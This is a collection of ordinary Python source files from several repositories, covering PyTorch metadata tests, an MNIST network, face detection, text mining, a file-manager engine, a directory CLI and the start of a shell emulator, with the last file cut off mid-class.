+{"seq_id":"34343327028","text":"from sklearn.model_selection import train_test_split\nfrom sklearn.datasets import load_iris, load_boston\nimport pandas as pd\nimport numpy as np\n\nfrom ai_metadata import ModelSerialization, MiningFunction, MetadataModel\n\nseed = 123456\ntest_size = 0.33\n\n\ndef get_classifier():\n import torch.nn as nn # PyTorch's module wrapper\n\n class Classifier(nn.Module):\n def __init__(self):\n super(Classifier, self).__init__()\n self.h_layer = nn.Linear(4, 3)\n self.s_layer = nn.Softmax()\n\n def forward(self, x):\n y = self.h_layer(x)\n p = self.s_layer(y)\n return p\n\n return Classifier()\n\n\ndef get_net():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n import torch.nn.functional as F\n\n class Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, 1)\n self.conv2 = nn.Conv2d(32, 64, 3, 1)\n self.dropout1 = nn.Dropout2d(0.25)\n self.dropout2 = nn.Dropout2d(0.5)\n self.fc1 = nn.Linear(9216, 128)\n self.fc2 = nn.Linear(128, 10)\n\n def forward(self, x):\n x = self.conv1(x)\n x = F.relu(x)\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(x)\n x = torch.flatten(x, 1)\n x = self.fc1(x)\n x = F.relu(x)\n x = self.dropout2(x)\n x = self.fc2(x)\n output = F.log_softmax(x, dim=1)\n return output\n\n return Net()\n\n\ndef test_classification():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n from torch.autograd import Variable # PyTorch's implementer of gradient descent and back\n\n X, y = load_iris(return_X_y=True)\n Y = pd.get_dummies(y).values\n X_train, X_test, y_train, y_test = train_test_split(X, Y, test_size=test_size, random_state=seed)\n\n X_train_v = Variable(torch.FloatTensor(X_train), requires_grad=False)\n y_train_v = Variable(torch.FloatTensor(y_train), requires_grad=False)\n X_test_v = Variable(torch.FloatTensor(X_test), requires_grad=False)\n y_test_v = Variable(torch.FloatTensor(y_test), requires_grad=False)\n\n classifier = get_classifier() # declaring the classifier to an object\n loss_fn = nn.BCELoss() # calculates the loss\n optim = torch.optim.SGD(classifier.parameters(), lr=0.01)\n\n for num in range(100): # 100 iterations\n pred = classifier(X_train_v) # predict\n loss = loss_fn(pred, y_train_v) # calculate loss\n optim.zero_grad() # zero gradients to not accumulate\n loss.backward() # update weights based on loss\n optim.step() # update optimiser for next iteration\n\n model = MetadataModel.wrap(classifier,\n x_test=X_test,\n y_test=y_test,\n source_object=get_classifier)\n model_metadata = model.model_metadata()\n\n print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'] == [\n {\n \"name\": None,\n \"sample\": [\n [\n 5.7,\n 4.4,\n 1.5,\n 0.4\n ]\n ],\n \"type\": \"float64\",\n \"shape\": [\n None,\n 4\n ]\n }\n ]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": [\n 1,\n 0,\n 0\n ],\n \"type\": \"uint8\",\n \"shape\": [\n None,\n 3\n ]\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": \"float32\",\n \"shape\": [\n None,\n 3\n ]\n }\n ]\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['object_name'] == 'get_classifier'\n assert model_metadata['object_source']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.CLASSIFICATION\n assert 
model.save_model('./pytorch-cls')\n\n\ndef test_regression():\n import torch\n import torch.nn as nn # PyTorch's module wrapper\n\n X, y = load_boston(return_X_y=True)\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=seed)\n\n torch.set_default_dtype(torch.float64)\n\n dim = X.shape[1]\n net = nn.Sequential(\n nn.Linear(dim, 50, bias=True), nn.ELU(),\n nn.Linear(50, 50, bias=True), nn.ELU(),\n nn.Linear(50, 50, bias=True), nn.Sigmoid(),\n nn.Linear(50, 1)\n )\n criterion = nn.MSELoss()\n opt = torch.optim.Adam(net.parameters(), lr=.0005)\n y_train_t = torch.from_numpy(y_train).clone().reshape(-1, 1)\n x_train_t = torch.from_numpy(X_train).clone()\n\n losssave = []\n stepsave = []\n\n for i in range(100):\n y_hat = net(x_train_t)\n loss = criterion(y_train_t, net(x_train_t))\n losssave.append(loss.item())\n stepsave.append(i)\n loss.backward()\n opt.step()\n opt.zero_grad()\n y_hat_class = (y_hat.detach().numpy())\n accuracy = np.sum(y_train.reshape(-1, 1) == y_hat_class) / len(y_train)\n if i > 0 and i % 100 == 0:\n print('Epoch %d, loss = %g acc = %g ' % (i, loss, accuracy))\n\n model = MetadataModel.wrap(net,\n x_test=X_test,\n y_test=y_test)\n model_metadata = model.model_metadata()\n\n print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'] == [\n {\n \"name\": None,\n \"sample\": [\n [\n 22.5971,\n 0.0,\n 18.1,\n 0.0,\n 0.7,\n 5.0,\n 89.5,\n 1.5184,\n 24.0,\n 666.0,\n 20.2,\n 396.9,\n 31.99\n ]\n ],\n \"type\": \"float64\",\n \"shape\": [\n None,\n 13\n ]\n }\n ]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": 7.4,\n \"type\": \"float64\",\n \"shape\": None\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": \"float64\",\n \"shape\": [\n None,\n 1\n ]\n }\n ]\n\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.REGRESSION\n assert model.save_model('./pytorch-reg')\n\n\ndef test_mnist():\n import torch\n import torch.optim as optim\n from torchvision import datasets, transforms\n from torch.optim.lr_scheduler import StepLR\n\n use_cuda = torch.cuda.is_available()\n batch_size = 64\n lr = 1.0\n gamma = 0.7\n epochs = 1\n\n torch.manual_seed(seed)\n device = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n kwargs = {'batch_size': batch_size}\n if use_cuda:\n kwargs.update({'num_workers': 1,\n 'pin_memory': True,\n 'shuffle': True},\n )\n\n transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n dataset1 = datasets.MNIST('./data', train=True, download=True, transform=transform)\n dataset2 = datasets.MNIST('./data', train=False, transform=transform)\n train_loader = torch.utils.data.DataLoader(dataset1, **kwargs)\n test_loader = torch.utils.data.DataLoader(dataset2, **kwargs)\n\n net = get_net().to(device)\n optimizer = optim.Adadelta(net.parameters(), lr=lr)\n\n scheduler = StepLR(optimizer, step_size=1, gamma=gamma)\n\n for epoch in range(1, epochs + 1):\n run_train(net, device, train_loader, optimizer)\n run_test(net, device, test_loader)\n scheduler.step()\n\n examples = enumerate(test_loader)\n batch_idx, (x_test, y_test) = next(examples)\n\n model = MetadataModel.wrap(net,\n x_test=x_test,\n y_test=y_test,\n source_object=get_net)\n model_metadata = model.model_metadata()\n\n 
print(model.model_metadata(as_json=True, indent=4))\n assert model_metadata['inputs'][0]['shape'] == [None, 1, 28, 28]\n assert model_metadata['targets'] == [\n {\n \"name\": None,\n \"sample\": 7,\n \"type\": \"int64\",\n \"shape\": None\n }\n ]\n assert model_metadata['outputs'] == [\n {\n \"name\": None,\n \"type\": \"float64\",\n \"shape\": [\n None,\n 10\n ]\n }\n ]\n\n prediction = model.predict(model_metadata['inputs'][0]['sample'])\n assert prediction.tolist()\n assert model_metadata['metrics']\n assert model_metadata['object_name'] == 'get_net'\n assert model_metadata['object_source']\n assert model_metadata['serialization'] == ModelSerialization.PYTORCH\n assert model_metadata['function_name'] == MiningFunction.CLASSIFICATION\n assert model.save_model('./pytorch-mnist')\n\n\ndef run_train(model, device, train_loader, optimizer):\n import torch.nn.functional as F\n\n model.train()\n for batch_idx, (data, target) in enumerate(train_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n\n\ndef run_test(model, device, test_loader):\n import torch\n import torch.nn.functional as F\n\n model.eval()\n test_loss = 0\n correct = 0\n with torch.no_grad():\n for data, target in test_loader:\n data, target = data.to(device), target.to(device)\n output = model(data)\n test_loss += F.nll_loss(output, target, reduction='sum').item() # sum up batch loss\n pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n correct += pred.eq(target.view_as(pred)).sum().item()\n\n test_loss /= len(test_loader.dataset)\n\n print('\\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\\n'.format(\n test_loss, correct, len(test_loader.dataset),\n 100. * correct / len(test_loader.dataset)))\n\n","repo_name":"autodeployai/ai-metadata","sub_path":"test/test_pytorch.py","file_name":"test_pytorch.py","file_ext":"py","file_size_in_byte":10908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"27607881578","text":"K = int(input())\nlst = list(input().split())\n\nans_min = 10**10\nans_max = -10**10\n\n\ndef dfs(idx, string):\n global ans_min, ans_max\n if idx == K+1:\n ans_min = min(ans_min, int(string))\n ans_max = max(ans_max, int(string))\n return\n\n for i in range(10):\n if not visited[i]:\n if idx == 0:\n visited[i] = 1\n dfs(idx + 1, string + str(i))\n visited[i] = 0\n\n else:\n if eval(string[idx-1] + lst[idx-1] + str(i)):\n visited[i] = 1\n dfs(idx + 1, string + str(i))\n visited[i] = 0\n\n\nvisited = [0] * 10\ndfs(0, '')\nprint(str(ans_max).zfill(K+1))\nprint(str(ans_min).zfill(K+1))","repo_name":"nimunsang/Algorithm","sub_path":"Implementation/2529.py","file_name":"2529.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9375739453","text":"from data import *\n\nimages, labels, images_test, labels_test, images_validate, labels_validate = load_data()\n\n# 3 hidden layer\n# 784 -> 40 -> 30 -> 10 -> 10\nINPUTLAYER = 784\nHIDDENLAYER1 = 40\nHIDDENLAYER2 = 30\nHIDDENLAYER3 = 20\nOUTPUTLAYER = 10\n\n# global weights and biases for each layer\nweights_in_to_h1 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER1, INPUTLAYER))\nweights_h1_to_h2 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER2, HIDDENLAYER1))\nweights_h2_to_h3 = np.random.uniform(-0.5, 0.5, (HIDDENLAYER3, HIDDENLAYER2))\nweights_h3_to_out = np.random.uniform(-0.5, 0.5, (OUTPUTLAYER, HIDDENLAYER3))\nbias_in_to_h1 = np.zeros((HIDDENLAYER1, 1))\nbias_h1_to_h2 = np.zeros((HIDDENLAYER2, 1))\nbias_h2_to_h3 = np.zeros((HIDDENLAYER3, 1))\nbias_h3_to_out = np.zeros((OUTPUTLAYER, 1))\n\n# for plotting accuracy vs epoch\nrecord_train = []\nrecord_validate = []\nrecord_cost = []\n\n\ndef forward_propagation(image):\n # multiply weights by the input matrix: weights_in_to_h1 @ image\n # add the bias: + bias_in_to_h1\n # run it through an activation function to normalize, we are using sigmoid\n\n # Forward propagation input -> hidden1\n hidden1 = sigmoid(bias_in_to_h1 + weights_in_to_h1 @ image)\n # Forward propagation hidden1 -> hidden2\n hidden2 = sigmoid(bias_h1_to_h2 + weights_h1_to_h2 @ hidden1)\n # Forward propagation hidden2 -< hidden3\n hidden3 = sigmoid(bias_h2_to_h3 + weights_h2_to_h3 @ hidden2)\n # Forward propagation hidden3 -> output\n output = sigmoid(bias_h3_to_out + weights_h3_to_out @ hidden3)\n\n return output, hidden1, hidden2, hidden3\n\n\ndef backward_propagation(img, label, output, hidden1, hidden2, hidden3):\n # make sure we are grabbing the weights defined globally\n global weights_in_to_h1, weights_h1_to_h2, weights_h2_to_h3, weights_h3_to_out\n global bias_in_to_h1, bias_h1_to_h2, bias_h2_to_h3, bias_h3_to_out\n\n # TODO: employ validation tester results to this instead\n # Backpropagation output -> hidden3 (cost function derivative)\n delta_output = output - label\n weights_h3_to_out += -learn_rate * delta_output @ np.transpose(hidden3)\n bias_h3_to_out += -learn_rate * delta_output\n\n # Backpropagation hidden3 -> hidden2 (activation function derivative)\n delta_hidden3 = np.transpose(weights_h3_to_out) @ delta_output * deriv_sigmoid(hidden3)\n weights_h2_to_h3 += -learn_rate * delta_hidden3 @ np.transpose(hidden2)\n bias_h2_to_h3 += -learn_rate * delta_hidden3\n\n # Backpropagation hidden2 -> hidden1 (activation function derivative)\n delta_hidden2 = np.transpose(weights_h2_to_h3) @ delta_hidden3 * deriv_sigmoid(hidden2)\n weights_h1_to_h2 += -learn_rate * delta_hidden2 @ np.transpose(hidden1)\n bias_h1_to_h2 += -learn_rate * delta_hidden2\n\n # Backpropagation hidden1 -> input (activation function derivative)\n delta_hidden1 = np.transpose(weights_h1_to_h2) @ delta_hidden2 * deriv_sigmoid(hidden1)\n weights_in_to_h1 += -learn_rate * delta_hidden1 @ np.transpose(img)\n bias_in_to_h1 += -learn_rate * delta_hidden1\n\n\n# main training code ----------------------------------------------------------\nlearn_rate = LEARNING_RATE\nepochs = EPOCHS\nnum_correct = 0\nfor epoch in range(epochs):\n error_avg_sum = 0\n for img, label in zip(images, labels):\n # needed to change from vector to a matrix\n img.shape += (1,)\n label.shape += (1,)\n\n # Forward propagation -----------------------------\n output, hidden1, hidden2, hidden3 = forward_propagation(img)\n\n # Loss + Error calculation\n error_avg_sum += mean_squared_error(output, label)[0]\n 
num_correct += int(np.argmax(output) == np.argmax(label))\n\n # Backpropagation ---------------------------------\n backward_propagation(img, label, output, hidden1, hidden2, hidden3)\n\n # Show accuracy for this epoch\n accuracy = round((num_correct / images.shape[0]) * 100, 2)\n num_correct = 0\n # Calculate average loss for this epoch\n error_rate = round((error_avg_sum / SPLIT_TRAIN_SIZE) * 100, 2)\n # Validate against validation set for this epoch\n sum_of_correct_preds = tester(images_validate, labels_validate, forward_propagation)\n validate_length = len(images_validate)\n validation_accuracy = round(sum_of_correct_preds / validate_length * 100, 2)\n print(f\"{epoch+1}\\tAcc: {accuracy}%\\tValidation: {validation_accuracy}%\\tAvg Loss: {error_rate}\")\n\n record_train.append((epoch, accuracy))\n record_validate.append((epoch, validation_accuracy))\n record_cost.append((epoch, error_rate))\n\n\n\n# Testing on test set\nsum_of_correct_preds = tester(images_test, labels_test, forward_propagation)\ntest_length = len(images_test)\ntesting_set_acc = round(sum_of_correct_preds / test_length * 100, 2)\nprint(f\"Testing set accuracy: {testing_set_acc}%\")\n\n\n\nchat_bot_dict = {\n 1: 'DEEZ NODES SAY THAT',\n 2: '...',\n 3: 'HELLO FRIEND!',\n 4: 'USER, I BELIEVE'\n}\n\n# Show results ctrl-c out or 20 times\n#while True:\nif SHOWTEST == True:\n for i in range(20):\n #index = int(input(\"Enter a number (0 - 59999): \"))\n index = np.random.randint(0, len(img))\n img = images[index]\n plt.imshow(img.reshape(28, 28), cmap=\"Greys\")\n\n img.shape += (1,)\n output, hidden1, hidden2, hidden3 = forward_propagation(img)\n\n text = chat_bot_dict[np.random.randint(1, 5)]\n plt.title(f\"{text} THE ANSWER IS: {output.argmax()} :D\")\n plt.show()\n","repo_name":"afnleaf/MNIST_NeuralNet","sub_path":"nn_3layer.py","file_name":"nn_3layer.py","file_ext":"py","file_size_in_byte":5423,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"18516507496","text":"import cv2\r\n\r\ncas_classifier = cv2.CascadeClassifier('HAARCascadeFaceDetection/haarcascade_frontalface_default.xml')\r\ncap = cv2.VideoCapture(0)\r\n# Capture frame-by-frame\r\nwhile True:\r\n ret, frame = cap.read()\r\n gray = cv2.cvtColor(frame, 0)\r\n detections = cas_classifier.detectMultiScale(gray,scaleFactor=1.3,minNeighbors=5)\r\n if(len(detections) > 0):\r\n (x,y,w,h) = detections[0]\r\n frame = cv2.rectangle(frame,(x,y),(x+w,y+h),(150,0,150),2)\r\n cv2.imshow('frame',frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n \tbreak\r\n\r\n#release the capture\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"ManavTriesStuff/FaceDetection","sub_path":"FaceDetect.py","file_name":"FaceDetect.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"42634689727","text":"from turtle import *\ntela = Screen()\ncao = Turtle()\ncao.color(\"red\")\ncao.forward(70)\ncao.right(90)\ncao.forward(200)\ngato = Turtle()\ngato.color(\"blue\")\ngato.right(90)\ngato.forward(200)\ngato.left(90)\ngato.forward(70)\nlebre = Turtle()\nlebre.color(\"green\")\nlebre.forward(120)\nlebre.right(90)\nlebre.forward(200)\nlebre.right(90)\nlebre.forward(50)\npangolim = Turtle()\npangolim.color(\"yellow\")\npangolim.right(90)\npangolim.forward(240)\npangolim.left(90)\npangolim.forward(70)\npangolim.left(90)\npangolim.forward(40)\n","repo_name":"in1076/in1076.github.io","sub_path":"_site/programas/01_caotaruga.py","file_name":"01_caotaruga.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"43730117002","text":"import pandas as pd\nimport string\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom PIL import Image\nimport wordcloud\nfrom collections import Counter\nimport os\nimport re\nimport nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize, sent_tokenize\nfrom nltk.stem import WordNetLemmatizer, PorterStemmer, SnowballStemmer\n\n\n# Read the data\ndf = pd.read_csv('final.csv')\n\n\nnltk.data.path.append('/home/mahshid/nltk_data/corpora/stopwords')\n\n# Download the stopwords corpus from NLTK\nstop_words = set(stopwords.words('english'))\nnltk.download('punkt')\nnltk.download('wordnet')\n\n# Define a function to preprocess text\ndef preprocess_text(text):\n\n # Convert to lowercase\n text = text.lower()\n\n # Tokenize the text into words\n words = word_tokenize(text)\n\n\n # Remove Unicode Characters\n text = re.sub(r\"(@\\[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)|^rt|http.+?\", \" \", text)\n text = re.sub(r\"(@\\[A-Za-z0-9]|^rt|http.+?)|(git-svn-id)|(://svn.apache.org/repos/asf/jakarta)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\",\" \",text)\n \n # Remove Digit\n new_str = \"\"\n\n for c in text:\n if c.isdigit():\n new_str += \" \"\n else:\n new_str += c\n\n text = new_str\n\n text = \" \".join([word for word in text.split() if len(word) > 2])\n\n\n p = [\n \"fbbffaedef\", \"sandbox\", \"trunk\", \"license\" , \"bcel\" , \"vfs\" , \"apache\" , \"contact\" , \"address\", \"svn\", \"https\", \"www\", \"org\", \"com\",\n \"net\", \"http\", \"id\", \"gitsvnid\", \"tags\", \"branches\", \"jakarta\", \"codec\", \"commons\",\"git\", \"license\",\n \"ffaedef\", \"ffa\", \"edef\", \"and\", \"for\", \"the\"]\n\n text = list(filter(lambda x: x not in p, text.split()))\n \n\n\n # Remove stop wordsze(text)\n words = [word for word in str(text).split() if word not in stop_words]\n \n # Stem the words\n stemmer = SnowballStemmer('english')\n words = [stemmer.stem(word) for word in words]\n\n \n # Lemmatize the words\n lemmatizer = WordNetLemmatizer()\n words = [lemmatizer.lemmatize(word) for word in words]\n\n\n text = \" \".join(text)\n return text\n\n\n# Create a new dataframe for commits with improved readability\ndf_improved = df[df['readability'] > 0].copy()\n# Preprocess the commit messages in the improved readability dataframe\ndf_improved['preprocessed_commit_msg'] = df_improved['commit_msg'].apply(preprocess_text)\n\n# frequency of words\ntext_frequency = df_improved['commit_msg'].apply(preprocess_text).str.split(expand=True).stack()\ntext_frequency = Counter(text_frequency)\nmost_common_words = text_frequency.most_common(5)\nfrequency = pd.DataFrame(most_common_words, columns=['word', 'frequency'])\n\nplt.bar(frequency['word'], frequency['frequency'])\nplt.show()\n\n\n# Create a Wordcloud for improved readability\nimproved_wordcloud = wordcloud.WordCloud(collocations = False, background_color='white').generate(' '.join(df_improved['preprocessed_commit_msg']))\nplt.imshow(improved_wordcloud, interpolation='bilinear')\nplt.axis('off')\nplt.show()\n\n# Create a new dataframe for commits with decreased readability\ndf_decreased = df[df['readability'] < 0].copy()\n# Preprocess the commit messages in the decreased readability dataframe\ndf_decreased['preprocessed_commit_msg'] = df_decreased['commit_msg'].apply(preprocess_text)\n\n# frequency of words\ntext_frequency = df_decreased['commit_msg'].apply(preprocess_text).str.split(expand=True).stack()\ntext_frequency = Counter(text_frequency)\nmost_common_words = 
text_frequency.most_common(5)\nfrequency = pd.DataFrame(most_common_words, columns=['word', 'frequency'])\n\nplt.bar(frequency['word'], frequency['frequency'])\nplt.show()\n\n\n# Create a Wordcloud for decreased readability\ndecreased_wordcloud = wordcloud.WordCloud(collocations= False, background_color='white').generate(' '.join(df_decreased['preprocessed_commit_msg']))\nplt.imshow(decreased_wordcloud, interpolation='bilinear')\nplt.axis('off')\nplt.show()\n","repo_name":"MoonGirl99/Code-Readability-Analysis-and-Prediction","sub_path":"text mining.py","file_name":"text mining.py","file_ext":"py","file_size_in_byte":3894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"40754974126","text":"def remove_duplicate(lst):\r\n j = 0\r\n lst.sort()\r\n for i in range(len(lst) - 1):\r\n if lst[i] != lst[i + 1]:\r\n lst[j] = lst[i]\r\n j += 1\r\n lst[j] = lst[-1]\r\n for _ in range(len(lst) - j - 1):\r\n lst.pop()\r\n\r\nlst1 = [2,2,2,2,2]\r\nremove_duplicate(lst1)\r\nprint(lst1)\r\n\r\nlst2 = [5,2,3,6,4,2,5,4,3,7,8,7,6,7,8,9,4,5,7,2]\r\nremove_duplicate(lst2)\r\nprint(lst2)","repo_name":"ShangZhao2000/algorithms","sub_path":"remove_duplicate.py","file_name":"remove_duplicate.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73315649928","text":"from __future__ import absolute_import, unicode_literals\n\nfrom .nomenclature import AirProperties, RefProperties\nfrom .safeprop import airprop, phase, refprop\n\n__banner__ = r\"\"\"\n ____ ___ ___\n / __/__ _/ _/__ / _ \\_______ ___\n _\\ \\/ _ `/ _/ -_) ___/ __/ _ \\/ _ \\\n/___/\\_,_/_/ \\__/_/ /_/ \\___/ .__/\n /_/ by Andrew Hjortland\n\"\"\"\n\n__title__ = 'safeprop'\n__summary__ = 'Wrappers for CoolProp for safe property calculations.'\n__uri__ = 'https://github.com/ahjortland/safeprop'\n\n__version__ = '0.0.1'\n\n__author__ = 'Andrew Hjortland'\n__email__ = 'andrew.hjortland@gmail.com'\n\n__license__ = 'MIT'\n__copyright__ = 'Copyright 2016 Andrew Hjortland'\n","repo_name":"abahman/safeprop","sub_path":"safeprop/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28666229888","text":"import sys\n\nn = int(sys.stdin.readline())\nwords = [input() for _ in range(n)]\n\n# 중복제거\nwords = list(set(words))\n\nwords.sort(key=lambda x:[len(x), x])\n\nfor word in words:\n print(word)\n\n# https://www.acmicpc.net/problem/1181","repo_name":"Gajeju/Coding_test_Programming","sub_path":"bkackjoon/step/12_sort/P08_1181.py","file_name":"P08_1181.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"9436022445","text":"data ={1:'Navin',2:'kiran',4:'Harsh'}\n#print(data[1])\n#print(data.get(3))\n#print(data.get(2,'Not found'))\n#print(data.get(3,'Not found'))\nkeys=['Navin','kiran','Harsh']\nvalues=['JS','Python','Java']\ndatas=dict(zip(keys,values))#zip() in python can be used to join two files\n#print(datas)\n#print(datas['kiran'])\ndatas['Monica']=['CS']\n#print(datas['Monica'])\n#print(datas)\nprogL={'JS':'Atom','CS':'VS','Python':['Pycharm','Spyder'],'Java':{'JavaSE':'Netbeans','JavaEE':'Eclipse'}}\n#print(progL['Python'][1])\n#print(progL['Java']['JavaSE'])\ndata2=data.copy()\ndel data2[2]\n#print(data2)\n#print(data)\ndata2.update({3:'Neha'})#update() function is used to add new items to a dictionary\n#print(data2.items())\n#print(data2.keys())\nprint(data2.values())\n\n\n","repo_name":"Nirvik-Sarkar/Python-tutorial","sub_path":"Dictionary.py","file_name":"Dictionary.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"28438997520","text":"\"\"\"\nDetermines commands to be run in order to update the original directory and match\nthe state of the edit directory.\n\"\"\"\nfrom roamer.command import Command\nfrom roamer import record\nfrom roamer.entry import Entry\nfrom roamer.directory import Directory\n\nclass Engine(object):\n def __init__(self, original_dir, edit_dir):\n self.original_dir = original_dir\n self.edit_dir = edit_dir\n self.commands = []\n\n def compile_commands(self):\n self.compare_dirs()\n self.new_entries()\n self.handle_unknown_digests()\n self.save_copy_over_files_to_trash()\n\n def compare_dirs(self):\n for digest, original_entry in self.original_dir.entries.items():\n new_entries = self.edit_dir.find(digest)\n if new_entries is None:\n self.commands.append(Command('roamer-trash-copy', original_entry))\n continue\n found_original = False\n for new_entry in new_entries:\n if new_entry.name == original_entry.name:\n found_original = True\n else:\n self.commands.append(Command('cp', original_entry, new_entry))\n if not found_original:\n self.commands.append(Command('roamer-trash-copy', original_entry))\n\n def new_entries(self):\n add_blank_entries = self.edit_dir.find(None)\n if add_blank_entries:\n for entry in add_blank_entries:\n self.commands.append(Command('touch', entry))\n\n def handle_unknown_digests(self):\n unknown_digests = set(self.edit_dir.entries.keys()) - set(self.original_dir.entries.keys())\n\n for digest in filter(None, unknown_digests):\n entries = load_entries(filter_dir=self.original_dir)\n trash_entries = load_entries(trash=True)\n outside_entry = entries.get(digest) or trash_entries.get(digest)\n if outside_entry is None:\n raise Exception('digest %s not found' % digest)\n\n for entry in self.edit_dir.find(digest):\n new_entry = Entry(entry.name, self.original_dir)\n self.commands.append(Command('cp', outside_entry, new_entry))\n\n def save_copy_over_files_to_trash(self):\n trash_entries = [c.first_entry for c in self.commands if c.cmd == 'roamer-trash-copy']\n copy_over_entires = [c.second_entry.name for c in self.commands if c.cmd == 'cp']\n for entry in trash_entries:\n if entry.name not in copy_over_entires:\n self.commands.append(Command('rm', entry))\n\n def commands_to_str(self):\n string_commands = [str(command) for command in sorted(self.commands)]\n # sort so that cp comes first. Need to copy before removals happen\n return '\\n'.join(string_commands)\n\n def run_commands(self):\n return [command.execute() for command in sorted(self.commands)]\n\n\ndef load_entries(**kwargs):\n dictionary = {}\n for row in record.load(**kwargs):\n entry = Entry(row['name'], Directory(row['path'], []), row['digest'])\n dictionary[row['digest']] = entry\n return dictionary\n","repo_name":"abaldwin88/roamer","sub_path":"roamer/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","stars":608,"dataset":"github-code","pt":"16"}
+{"seq_id":"6889189628","text":"import argparse\nimport sys\n\nfrom cryptopyutils import dirs\n\n\ndef main():\n \"\"\"Dirs Manipulation CLI\"\"\"\n parser = argparse.ArgumentParser(description=\"DIRECTORY MANIPULATION\")\n parser.add_argument(\"action\", choices=[\"mkdir\", \"rmdir\"], help=\"Action\")\n parser.add_argument(\"dir\", help=\"Directory\")\n args = parser.parse_args()\n if args.action == \"mkdir\":\n dirs.mkdir(args.dir)\n print(\"Created folder : %s\" % args.dir)\n elif args.action == \"rmdir\":\n # prevent accidental system damage\n if args.dir in [\n \"/\",\n \"/etc\",\n \"/bin\",\n \"/boot\",\n \"/dev\",\n \"/home\",\n \"/init\",\n \"/lib\",\n \"/lib32\",\n \"/lib64\",\n \"/libx32\",\n \"/lost+found\",\n \"/media\",\n \"/mnt\",\n \"/opt\",\n \"/proc\",\n \"/root\",\n \"/run\",\n \"/sbin\",\n \"/snap\",\n \"/srv\",\n \"/sys\",\n \"/tmp\",\n \"/usr\",\n \"/var\",\n \"~\",\n \"$HOME\",\n ]:\n print(\"Cannot remove system or home directories\")\n sys.exit(1)\n # remove\n dirs.rmdir(args.dir)\n print(\"Removed folder : %s\" % args.dir)\n else:\n print(\"Command not supported\")\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dheurtev/cryptopyutils","sub_path":"src/cryptopyutils/cli/dirs.py","file_name":"dirs.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"14131479318","text":"import re\nimport os\nfrom os import listdir\nimport glob\n\nfrom abc import ABC, abstractmethod\nfrom typing import List\n\n\nclass Application(ABC):\n \"\"\"\n Application is an abstract base class for all applications to inherit from\n It takes in arguments and returns the output ready for the output stream\n \"\"\"\n\n @abstractmethod\n def exec(self, args) -> List[str]:\n pass\n\n def raise_error(self, message, type, output) -> None:\n if self.unsafe:\n output.append(message + \"\\n\")\n else:\n if type == \"file_not_found\":\n raise FileNotFoundError(message)\n elif type == \"not_directory\":\n raise NotADirectoryError(message)\n elif type == \"value\":\n raise ValueError(message)\n elif type == \"type\":\n raise TypeError(message)\n else:\n raise RuntimeError(message)\n\n\nclass Pwd(Application):\n \"\"\"\n Pwd implements the 'pwd' shell function\n It outputs the current working directory followed by a newline.\n \"\"\"\n\n def __init__(self, unsafe) -> None:\n self.unsafe = 